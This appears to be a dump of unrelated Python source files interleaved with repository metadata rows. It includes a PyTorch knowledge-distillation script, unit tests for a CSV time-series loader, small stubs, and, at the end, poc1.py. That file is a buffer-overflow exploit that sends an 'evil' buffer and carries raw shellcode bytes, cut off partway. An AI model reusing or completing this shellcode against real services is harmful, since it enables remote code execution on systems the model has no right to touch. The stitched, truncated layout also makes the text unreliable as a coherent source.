| 19.35 | 50 | 0.669251 | 44 | 387 | 5.477273 | 0.636364 | 0.311203 | 0.232365 | 0.290456 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013378 | 0.22739 | 387 | 19 | 51 | 20.368421 | 0.792642 | 0.108527 | 0 | 0.272727 | 0 | 0 | 0.069971 | 0.061224 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | false | 0.090909 | 0 | 0.272727 | 0.727273 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 6 |
13e78102d294017c8b8ca8d1f8480cdd3bc98448 | 32 | py | Python | app/__init__.py | sofiabesenski4/scrapr | 18c67ac155e4d329dbd4845df80647e697a4f4bb | [
"MIT"
] | 1 | 2022-03-20T18:52:15.000Z | 2022-03-20T18:52:15.000Z | app/__init__.py | sofiabesenski4/scrapr | 18c67ac155e4d329dbd4845df80647e697a4f4bb | [
"MIT"
] | null | null | null | app/__init__.py | sofiabesenski4/scrapr | 18c67ac155e4d329dbd4845df80647e697a4f4bb | [
"MIT"
] | null | null | null | from app.views import QueryForm
| 16 | 31 | 0.84375 | 5 | 32 | 5.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b91cbddb4ef84ad241c211fc7f8fc5415fe16b12 | 9,864 | py | Python | distill/model_distill.py | jaykay233/tensorflow_models | 5b60b2adfa5e2d82c59189da6398388ba58c6c33 | [
"Apache-2.0"
] | null | null | null | distill/model_distill.py | jaykay233/tensorflow_models | 5b60b2adfa5e2d82c59189da6398388ba58c6c33 | [
"Apache-2.0"
] | null | null | null | distill/model_distill.py | jaykay233/tensorflow_models | 5b60b2adfa5e2d82c59189da6398388ba58c6c33 | [
"Apache-2.0"
] | null | null | null | ## https://www.kesci.com/mw/project/605fe41acb6d360015a49cea
import os.path as osp
import gzip
from functools import reduce
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader, TensorDataset
from torchvision.models import resnet18
from torchvision import datasets
import numpy as np
from keras.datasets import cifar100
def cifar100_loader(bsz=64):
tr, te = cifar100.load_data()
## train
img, label = tr
img = torch.from_numpy(img).float()
img = img / 255. # BHWC
img.transpose_(1, 3) # BCWH -> B 3 32 32
label = torch.from_numpy(label).long()[:, 0]
dst = TensorDataset(img, label)
loader = DataLoader(dst, batch_size=bsz, shuffle=True, num_workers=4, pin_memory=False)
## test
img, label = te
img = torch.from_numpy(img).float()
img = img / 255. # BHWC
img.transpose_(1, 3)
label = torch.from_numpy(label).long()[:, 0]
dst = TensorDataset(img, label)
te_loader = DataLoader(dst, batch_size=bsz * 2, shuffle=False, num_workers=4, pin_memory=False)
return loader, te_loader
class DeepCNN(nn.Module):
def __init__(self, input_shape=(3, 32, 32), classes=100):
super().__init__()
self.input_shape = input_shape
self.classes = classes
self.m = nn.Sequential(
nn.Conv2d(input_shape[0], 64, 3, 2, 1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(True),
nn.Conv2d(64, 128, 3, 2, 1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(True),
nn.Conv2d(128, 256, 3, 2, 1, bias=False),
nn.BatchNorm2d(256),
nn.ReLU(True),
nn.Conv2d(256, 512, 3, 2, 1, bias=False),
nn.BatchNorm2d(512),
nn.ReLU(True),
)
# 41.97
shape = self.get_shape() # 1CHW
d = shape[1] * shape[2] * shape[3]
self.fc = nn.Sequential(
nn.Linear(d, 64),
nn.Linear(64, classes),
)
self.criterion = nn.CrossEntropyLoss(reduction='none')
## init
tot = len(list(self.parameters()))
n = 0
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
n += 1
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
n += 2
print(f'Init {n}, total {tot}')
@torch.no_grad()
def get_shape(self):
x = torch.randn(1, *self.input_shape)
y = self.m(x)
return y.shape
def forward(self, x):
feat = self.m(x)
feat = feat.view(feat.shape[0], -1)
logit = self.fc(feat)
return logit
@torch.no_grad()
def get_p(self, x):
logit = self(x)
p = F.softmax(logit, 1)
return p
def get_loss(self, x, y):
logit = self(x)
loss = self.criterion(logit, y)
loss = loss.mean()
return loss
def train():
epochs = 20
base_lr = 1e-3
min_lr = 1e-5
batch_size = 256
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
model = DeepCNN((3, 32, 32), 100).to(device)
optimizer = torch.optim.Adam(model.parameters(), base_lr)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(
optimizer, 'max', .1, 4, False, .001, 'abs', min_lr=min_lr)
loader, dev_loader = cifar100_loader(batch_size)
step = 0
bst = 0
for epoch in range(1, 1 + epochs):
for x, y in loader:
x = x.to(device)
y = y.to(device)
step += 1
optimizer.zero_grad()
loss = model.get_loss(x, y)
loss.backward()
optimizer.step()
acc = eval(dev_loader, model, device)
lr = optimizer.param_groups[0]['lr']
print(f'epoch={epoch}, lr={lr:.2e}, dev_acc={acc * 100:.2f}%')
scheduler.step(acc)
if acc > bst:
bst = acc
save_name = 'bst.pt'
torch.save(model.state_dict(), save_name)
print(f'best dev acc={bst * 100:.2f}%')
class ShallowCNN(nn.Module):
def __init__(self, input_shape=(3, 32, 32), classes=100):
super().__init__()
self.input_shape = input_shape
self.classes = classes
self.m = nn.Sequential(
nn.Conv2d(input_shape[0], 64, 3, 2, 1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(True),
nn.Conv2d(64, 128, 3, 2, 1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(True),
)
# 36.76
shape = self.get_shape() # 1CHW
d = shape[1] * shape[2] * shape[3]
self.fc = nn.Sequential(
nn.Linear(d, 64),
nn.Linear(64, classes),
)
self.criterion = nn.CrossEntropyLoss(reduction='none')
## init
tot = len(list(self.parameters()))
n = 0
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
n += 1
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
n += 2
print(f'Init {n}, total {tot}')
@torch.no_grad()
def get_shape(self):
x = torch.randn(1, *self.input_shape)
y = self.m(x)
return y.shape
def forward(self, x):
feat = self.m(x)
feat = feat.view(feat.shape[0], -1)
logit = self.fc(feat)
return logit
@torch.no_grad()
def get_p(self, x):
logit = self(x)
p = F.softmax(logit, 1)
return p
def get_loss(self, x, y):
logit = self(x)
loss = self.criterion(logit, y)
loss = loss.mean()
return loss
class ShallowCNN(nn.Module):
def __init__(self, input_shape=(3, 32, 32), classes=100):
super().__init__()
self.input_shape = input_shape
self.classes = classes
self.m = nn.Sequential(
nn.Conv2d(input_shape[0], 64, 3, 2, 1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(True),
nn.Conv2d(64, 128, 3, 2, 1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(True),
)
# 36.76
shape = self.get_shape() # 1CHW
d = shape[1] * shape[2] * shape[3]
self.fc = nn.Sequential(
nn.Linear(d, 64),
nn.Linear(64, classes),
)
self.criterion_hard = nn.CrossEntropyLoss(reduction='none')
self.criterion_soft = nn.MSELoss(reduction='none')
## init
tot = len(list(self.parameters()))
n = 0
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
n += 1
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
n += 2
print(f'Init {n}, total {tot}')
@torch.no_grad()
def get_shape(self):
x = torch.randn(1, *self.input_shape)
y = self.m(x)
return y.shape
def forward(self, x):
feat = self.m(x)
feat = feat.view(feat.shape[0], -1)
logit = self.fc(feat)
return logit
@torch.no_grad()
def get_p(self, x):
logit = self(x)
p = F.softmax(logit, 1)
return p
# def get_loss(self, x, y, p, alpha=.5):
def get_loss(self, x, y, p, alpha=.5):
logit = self(x)
loss_hard = self.criterion_hard(logit, y).mean()
loss_soft = self.criterion_soft(logit, p).mean()
loss = alpha * loss_hard + (1 - alpha) * loss_soft
return loss
def kd():
ckpt = 'dev-acc-41.97.pt' # 这是我保存的teacher model的checkpoint,需要改成你自己的
epochs = 20
base_lr = 1e-3
min_lr = 1e-5
batch_size = 256
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
teacher_model = DeepCNN((3, 32, 32), 100)
teacher_model.load_state_dict(torch.load(ckpt, 'cpu'))
teacher_model.to(device)
teacher_model.eval()
model = ShallowCNN((3, 32, 32), 100).to(device)
optimizer = torch.optim.Adam(model.parameters(), base_lr)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(
optimizer, 'max', .1, 4, False, .001, 'abs', min_lr=min_lr)
loader, dev_loader = cifar100_loader(batch_size)
## validate
teacher_dev_acc = eval(dev_loader, teacher_model, device)
print(f'Teacher model dev acc={teacher_dev_acc * 100:.2f}%')
teacher_model.eval()
step = 0
tot_steps = epochs * len(loader)
bst = 0
for epoch in range(1, 1 + epochs):
for x, y in loader:
x = x.to(device)
y = y.to(device)
with torch.no_grad():
p = teacher_model(x) # logit
step += 1
optimizer.zero_grad()
start, end = .2, 0.
k = 1 / tot_steps - 1 / tot_steps * step # 0 -> -1
alpha = (start - end) * k + start
loss = model.get_loss(x, y, p, alpha)
loss.backward()
optimizer.step()
acc = eval(dev_loader, model, device)
lr = optimizer.param_groups[0]['lr']
print(f'epoch={epoch}, lr={lr:.2e}, alpha={alpha:.2f}'
f', loss={loss.item():.3f}, dev_acc={acc * 100:.2f}%')
scheduler.step(acc)
if acc > bst:
bst = acc
save_name = 'bst.pt'
torch.save(model.state_dict(), save_name)
print(f'best dev acc={bst * 100:.2f}%') | 28.758017 | 99 | 0.544201 | 1,329 | 9,864 | 3.924003 | 0.146727 | 0.018217 | 0.024161 | 0.010738 | 0.790221 | 0.776798 | 0.742282 | 0.732694 | 0.732694 | 0.726942 | 0 | 0.051435 | 0.318025 | 9,864 | 343 | 100 | 28.758017 | 0.7238 | 0.024939 | 0 | 0.789474 | 0 | 0 | 0.045042 | 0.002398 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067669 | false | 0 | 0.041353 | 0 | 0.169173 | 0.030075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b91e669f5395290ea96b61a6b23399c50caeb985 | 27 | py | Python | apps/profiles/tests/__init__.py | jamespacileo/packaginator | d4b51ae16e0658fade91e1a6c4ce987ee747b053 | [
"MIT"
] | 1 | 2015-11-08T11:31:09.000Z | 2015-11-08T11:31:09.000Z | apps/profiles/tests/__init__.py | pythonchelle/opencomparison | b39d279e25527520c66335e51455d1f9ba749c9b | [
"MIT"
] | 81 | 2021-02-14T02:35:52.000Z | 2021-04-10T21:14:27.000Z | apps/profiles/tests/__init__.py | pythonchelle/opencomparison | b39d279e25527520c66335e51455d1f9ba749c9b | [
"MIT"
] | 4 | 2021-02-14T19:44:23.000Z | 2021-04-06T22:35:35.000Z | from .test_models import *
| 13.5 | 26 | 0.777778 | 4 | 27 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b947054992da249a521caee248c8140441d1ae75 | 14,609 | py | Python | exabel_data_sdk/tests/scripts/test_load_time_series_from_csv.py | burk/python-sdk | 83fb81d09e0d6a407c8907a75bebb895decc7edc | [
"MIT"
] | null | null | null | exabel_data_sdk/tests/scripts/test_load_time_series_from_csv.py | burk/python-sdk | 83fb81d09e0d6a407c8907a75bebb895decc7edc | [
"MIT"
] | null | null | null | exabel_data_sdk/tests/scripts/test_load_time_series_from_csv.py | burk/python-sdk | 83fb81d09e0d6a407c8907a75bebb895decc7edc | [
"MIT"
] | null | null | null | import unittest
from unittest import mock
import pandas as pd
from dateutil import tz
from exabel_data_sdk import ExabelClient
from exabel_data_sdk.scripts.load_time_series_from_csv import LoadTimeSeriesFromCsv
from exabel_data_sdk.services.csv_time_series_loader import CsvTimeSeriesLoader
from exabel_data_sdk.util.resource_name_normalization import validate_signal_name
common_args = ["script-name", "--sep", ";", "--api-key", "123"]
class TestUploadTimeSeries(unittest.TestCase):
def test_one_signal(self):
data = [["a", "2021-01-01", 1], ["a", "2021-01-02", 2], ["b", "2021-01-01", 3]]
ts_data = pd.DataFrame(data, columns=["entity", "date", "signal1"])
CsvTimeSeriesLoader.set_time_index(ts_data)
time_series = CsvTimeSeriesLoader.get_time_series(ts_data, "signals/acme.")
pd.testing.assert_series_equal(
pd.Series(
[1, 2],
index=pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
name="a/signals/acme.signal1",
),
time_series[0],
)
pd.testing.assert_series_equal(
pd.Series(
[3],
index=pd.DatetimeIndex(["2021-01-01"], tz=tz.tzutc()),
name="b/signals/acme.signal1",
),
time_series[1],
)
def test_two_signals(self):
data = [
["a", "2021-01-01", 1, 100],
["a", "2021-01-02", 2, 200],
["b", "2021-01-01", 3, 300],
]
ts_data = pd.DataFrame(data, columns=["entity", "date", "signal1", "signal2"])
CsvTimeSeriesLoader.set_time_index(ts_data)
time_series = CsvTimeSeriesLoader.get_time_series(ts_data, "signals/acme.")
pd.testing.assert_series_equal(
pd.Series(
[1, 2],
index=pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
name="a/signals/acme.signal1",
),
time_series[0],
)
pd.testing.assert_series_equal(
pd.Series(
[100, 200],
index=pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
name="a/signals/acme.signal2",
),
time_series[1],
)
pd.testing.assert_series_equal(
pd.Series(
[3],
index=pd.DatetimeIndex(["2021-01-01"], tz=tz.tzutc()),
name="b/signals/acme.signal1",
),
time_series[2],
)
pd.testing.assert_series_equal(
pd.Series(
[300],
index=pd.DatetimeIndex(["2021-01-01"], tz=tz.tzutc()),
name="b/signals/acme.signal2",
),
time_series[3],
)
def test_read_file_without_pit(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries.csv",
"--namespace",
"",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
with self.assertRaises(SystemExit):
script.run_script(client, script.parse_arguments())
def test_read_file_use_header_for_signal(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries.csv",
"--namespace",
"",
"--pit-current-time",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
self.assertEqual(1, len(call_args_list))
series = call_args_list[0][0][0]
self.assertEqual(2, len(series))
pd.testing.assert_series_equal(
pd.Series(
range(1, 6),
pd.date_range("2021-01-01", periods=5, tz=tz.tzutc()),
name="entityTypes/company/entities/company_A/signals/signal1",
),
series[0],
check_freq=False,
)
pd.testing.assert_series_equal(
pd.Series(
[4, 5],
pd.DatetimeIndex(["2021-01-01", "2021-01-03"], tz=tz.tzutc()),
name="entityTypes/company/entities/company_B/signals/signal1",
),
series[1],
check_freq=False,
)
def test_read_file_with_multiple_signals(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_multiple_signals.csv",
"--namespace",
"acme",
"--pit-offset",
"0",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
self.assertEqual(1, len(call_args_list))
series = call_args_list[0][0][0]
self.assertEqual(4, len(series))
pd.testing.assert_series_equal(
pd.Series(
[1, 2],
pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
name="entityTypes/company/entities/company_A/signals/acme.signal1",
),
series[0],
)
pd.testing.assert_series_equal(
pd.Series(
[10, 20],
pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
name="entityTypes/company/entities/company_A/signals/acme.signal2",
),
series[1],
)
pd.testing.assert_series_equal(
pd.Series(
[4, 5],
pd.DatetimeIndex(["2021-01-01", "2021-01-03"], tz=tz.tzutc()),
name="entityTypes/company/entities/company_B/signals/acme.signal1",
),
series[2],
)
pd.testing.assert_series_equal(
pd.Series(
[40, 50],
pd.DatetimeIndex(["2021-01-01", "2021-01-03"], tz=tz.tzutc()),
name="entityTypes/company/entities/company_B/signals/acme.signal2",
),
series[3],
)
def test_read_file_with_known_time(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_known_time.csv",
"--namespace",
"acme",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
self.assertEqual(1, len(call_args_list))
series = call_args_list[0][0][0]
self.assertEqual(4, len(series))
index_A = pd.MultiIndex.from_arrays(
[
pd.DatetimeIndex(["2021-01-01", "2021-01-02"], tz=tz.tzutc()),
pd.DatetimeIndex(["2021-01-01", "2021-01-05"], tz=tz.tzutc()),
]
)
index_B = pd.MultiIndex.from_arrays(
[
pd.DatetimeIndex(["2021-01-01", "2021-01-03"], tz=tz.tzutc()),
pd.DatetimeIndex(["2021-01-10", "2019-12-31"], tz=tz.tzutc()),
]
)
pd.testing.assert_series_equal(
pd.Series(
[1, 2],
index_A,
name="entityTypes/company/entities/company_A/signals/acme.signal1",
),
series[0],
)
pd.testing.assert_series_equal(
pd.Series(
[10, 20],
index_A,
name="entityTypes/company/entities/company_A/signals/acme.signal2",
),
series[1],
)
pd.testing.assert_series_equal(
pd.Series(
[4, 5],
index_B,
name="entityTypes/company/entities/company_B/signals/acme.signal1",
),
series[2],
)
pd.testing.assert_series_equal(
pd.Series(
[40, 50],
index_B,
name="entityTypes/company/entities/company_B/signals/acme.signal2",
),
series[3],
)
def test_read_file_with_integer_identifiers(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_with_integer_identifiers.csv",
"--namespace",
"acme",
"--pit-offset",
"30",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
self.assertEqual(1, len(call_args_list))
series = call_args_list[0][0][0]
self.assertEqual(2, len(series))
pd.testing.assert_series_equal(
pd.Series(
range(1, 6),
pd.date_range("2021-01-01", periods=5, tz=tz.tzutc()),
name="entityTypes/brand/entities/acme.0001/signals/acme.signal1",
),
series[0],
check_freq=False,
)
pd.testing.assert_series_equal(
pd.Series(
[4, 5],
pd.DatetimeIndex(["2021-01-01", "2021-01-03"], tz=tz.tzutc()),
name="entityTypes/brand/entities/acme.0002/signals/acme.signal1",
),
series[1],
check_freq=False,
)
def test_should_fail_with_invalid_signal_names(self):
signals_errors = {
"0_starts_with_0": "Signal name must start with a letter, "
'contain only letters, numbers, and underscores, but got "0_starts_with_0"',
"contains_!llegal_chars": "Signal name must start with a letter, "
'contain only letters, numbers, and underscores, but got "contains_!llegal_chars"',
"": "Signal name cannot be empty",
"signal_with_sixty_five_characters_in_length_which_more_than_max__": "Signal name "
"cannot be longer than 64 characters, but got "
'"signal_with_sixty_five_characters_in_length_which_more_than_max__"',
}
for signal, error in signals_errors.items():
with self.assertRaises(ValueError) as cm:
validate_signal_name(signal)
self.assertEqual(str(cm.exception), error)
def test_valid_signal_names(self):
valid_signals = [
"signal",
"SIGNAL",
"signal_with_underscores",
"signal_1_with_underscores_and_numbers",
"signal_with_sixty_four_characters_in_length_which_is_the_maximum",
]
for signal in valid_signals:
validate_signal_name(signal)
def test_should_fail_with_invalid_data_points(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/time_series_with_invalid_data_points.csv",
"--namespace",
"acme",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
with self.assertRaises(SystemExit):
script.run_script(client, script.parse_arguments())
def test_valid_no_create_tag(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_known_time.csv",
"--namespace",
"acme",
"--no-create-tag",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
create_tag_status = call_args_list[0][1]["create_tag"]
self.assertEqual(False, create_tag_status)
def test_valid_create_tag(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_known_time.csv",
"--namespace",
"acme",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
script.run_script(client, script.parse_arguments())
call_args_list = client.time_series_api.bulk_upsert_time_series.call_args_list
create_tag_status = call_args_list[0][1]["create_tag"]
self.assertEqual(True, create_tag_status)
def test_valid_no_create_library_signal(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_known_time.csv",
"--namespace",
"acme",
"--create-missing-signals",
"--no-create-library-signal",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
client.signal_api.get_signal.return_value = None
script.run_script(client, script.parse_arguments())
call_args_list = client.signal_api.create_signal.call_args_list
create_library_signal_status = call_args_list[0][1]["create_library_signal"]
self.assertEqual(False, create_library_signal_status)
def test_valid_create_library_signal(self):
args = common_args + [
"--filename",
"./exabel_data_sdk/tests/resources/data/timeseries_known_time.csv",
"--namespace",
"acme",
"--create-missing-signals",
]
script = LoadTimeSeriesFromCsv(args)
client = mock.create_autospec(ExabelClient(host="host", api_key="123"))
client.signal_api.get_signal.return_value = None
script.run_script(client, script.parse_arguments())
call_args_list = client.signal_api.create_signal.call_args_list
create_library_signal_status = call_args_list[0][1]["create_library_signal"]
self.assertEqual(True, create_library_signal_status)
if __name__ == "__main__":
unittest.main()
| 37.267857 | 95 | 0.572729 | 1,621 | 14,609 | 4.889574 | 0.116595 | 0.027252 | 0.042392 | 0.047691 | 0.844058 | 0.817562 | 0.801792 | 0.790941 | 0.77782 | 0.756624 | 0 | 0.046858 | 0.301732 | 14,609 | 391 | 96 | 37.363171 | 0.730125 | 0 | 0 | 0.673295 | 0 | 0 | 0.211171 | 0.129851 | 0 | 0 | 0 | 0 | 0.096591 | 1 | 0.039773 | false | 0 | 0.022727 | 0 | 0.065341 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9a88f87e3242aee4d73cc395bbf3e4df7779e11 | 235 | py | Python | .history/my_classes/ScopesClosuresAndDecorators/ScopesClosuresDecorators_20210709201222.py | minefarmer/deep-Dive-1 | b0675b853180c5b5781888266ea63a3793b8d855 | [
"Unlicense"
] | null | null | null | .history/my_classes/ScopesClosuresAndDecorators/ScopesClosuresDecorators_20210709201222.py | minefarmer/deep-Dive-1 | b0675b853180c5b5781888266ea63a3793b8d855 | [
"Unlicense"
] | null | null | null | .history/my_classes/ScopesClosuresAndDecorators/ScopesClosuresDecorators_20210709201222.py | minefarmer/deep-Dive-1 | b0675b853180c5b5781888266ea63a3793b8d855 | [
"Unlicense"
] | null | null | null | """ Scopes, Closures and Decotations
Variable Scopes local scope
global scope
nonlocal scope
nested scopes
Closures what
""" | 26.111111 | 48 | 0.425532 | 16 | 235 | 6.25 | 0.6875 | 0.28 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.544681 | 235 | 9 | 49 | 26.111111 | 0.934579 | 0.902128 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9aea740a09324f0a12b3ad1a11b3ed2eb08d668 | 3,909 | py | Python | poc1.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | poc1.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | poc1.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import socket
try:
print "\n Sending ""evil"" buffer..."
# size = 800
# inputBuffer = "A" * size
# inputBuffer = "AAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba"
shellcode = ("\xd9\xc1\xd9\x74\x24\xf4\xbe\x58\xb8\x85\xc5\x5f\x33\xc9\xb1"
"\x52\x31\x77\x17\x83\xef\xfc\x03\x2f\xab\x67\x30\x33\x23\xe5"
"\xbb\xcb\xb4\x8a\x32\x2e\x85\x8a\x21\x3b\xb6\x3a\x21\x69\x3b"
"\xb0\x67\x99\xc8\xb4\xaf\xae\x79\x72\x96\x81\x7a\x2f\xea\x80"
"\xf8\x32\x3f\x62\xc0\xfc\x32\x63\x05\xe0\xbf\x31\xde\x6e\x6d"
"\xa5\x6b\x3a\xae\x4e\x27\xaa\xb6\xb3\xf0\xcd\x97\x62\x8a\x97"
"\x37\x85\x5f\xac\x71\x9d\xbc\x89\xc8\x16\x76\x65\xcb\xfe\x46"
"\x86\x60\x3f\x67\x75\x78\x78\x40\x66\x0f\x70\xb2\x1b\x08\x47"
"\xc8\xc7\x9d\x53\x6a\x83\x06\xbf\x8a\x40\xd0\x34\x80\x2d\x96"
"\x12\x85\xb0\x7b\x29\xb1\x39\x7a\xfd\x33\x79\x59\xd9\x18\xd9"
